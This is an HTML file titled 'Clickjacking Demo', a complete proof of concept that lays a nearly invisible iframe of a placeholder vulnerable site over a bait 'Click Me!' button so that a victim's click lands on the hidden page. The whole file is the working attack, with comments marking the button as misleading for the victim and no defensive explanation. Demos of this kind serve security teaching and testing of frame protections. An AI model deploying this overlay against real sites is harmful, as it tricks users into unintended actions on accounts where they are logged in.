<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Clickjacking Demo</title>
    <style>
        iframe {
            width: 800px;  /* Width of the iframe */
            height: 600px; /* Height of the iframe */
            opacity: 0.01; /* Make the iframe nearly invisible */
            position: absolute;
            top: 0;
            left: 0;
            z-index: 2;   /* Place it above the bait button */
        }
        button {
            position: absolute;
            top: 100px;
            left: 100px;
            z-index: 1;   /* Place it below the iframe */
        }
    </style>
</head>
<body>
    <button>Click Me!</button> <!-- Misleading button for the victim -->
    <iframe src="http://your-vulnerable-server.com/vulnerable.html"></iframe>
</body>
</html>

